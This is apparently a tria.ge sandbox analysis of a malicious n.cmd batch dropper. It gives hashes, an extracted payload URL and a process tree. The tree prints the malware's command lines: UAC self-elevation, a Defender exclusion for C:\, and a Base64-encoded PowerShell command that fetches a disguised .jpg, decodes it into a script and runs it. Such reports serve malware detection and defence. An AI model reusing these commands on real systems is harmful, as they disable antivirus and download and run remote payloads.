Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

n.cmd

windows7-x64

10

n.cmd

windows10-2004-x64

Analysis

  • max time kernel
    66s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    31/12/2024, 20:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    n.cmd

  • Size

    1KB

  • MD5

    fa75e849a3beb187d543d9b4ae894dcc

  • SHA1

    41b1a755057677bfa617c089ba6092733155a1f0

  • SHA256

    ea4b2c7dbf2be84aa81e55112e40392a7c54cfabde85d3ece594d834b3c9254d

  • SHA512

    eed68bf4aba6af83620591f9cdefbe5e954f5bfbb14116015c215b306ecde7e8f9736b7e886e6ecbc0a71dda8ba2a58c7f4b5b7b6354104652715052e016f91f

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://i.imghippo.com/files/CFqi5277Mc.jpg

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\n.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w h -command ""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\n.cmd' -ArgumentList 'am_admin'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2868
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n.cmd" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -w h -command ""
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2692
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2180
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAEMARgBxAGkANQAyADcANwBNAGMALgBqAHAAZwAiADsAJABwAGEAdABoAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE8AbgBlAEQAcgBpAHYAZQAiADsAbQBrAGQAaQByACAAJABwAGEAdABoACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsAaQB3AHIAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAIgAkAHAAYQB0AGgAXABiAHUAZABkAHkALgBqAHAAZwAiADsAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABUAGUAeAB0ACgAIgAkAHAAYQB0AGgAXABPAG4AZQBEAHIAaQB2AGUALgBjAG0AZAAiACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABnAGMAIAAiACQAcABhAHQAaABcAGIAdQBkAGQAeQAuAGoAcABnACIAIAAtAFIAYQB3ACkAKQApACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAHAAYQB0AGgAXABPAG4AZQBEAHIAaQB2AGUALgBjAG0AZAAiAA0ACgA=
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1672

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    8a4779b5f52772608ec3bed33b8d4c5e

    SHA1

    34e7a6c28514eff4be71b51a43b35f8708064a05

    SHA256

    220aa6a9aca3b3f53ddc97ff0af39d58ed3a0c1077d9a7c5d2973cef06ca4259

    SHA512

    6262a917775c375c577d6981e095b610b11aa0e8341f9f46aa198be9f1a986ff57df5cbf1bb6550a8ee54c0a6ab672f0425df7e001c022e3f624378c7cc62da4

    Download Submit

  • memory/2868-14-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2868-15-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2868-16-0x0000000001D30000-0x0000000001D38000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2932-4-0x000007FEF588E000-0x000007FEF588F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2932-6-0x0000000002470000-0x0000000002478000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2932-5-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2932-7-0x00000000025C4000-0x00000000025C7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2932-8-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

    Filesize

    9.6MB

    Download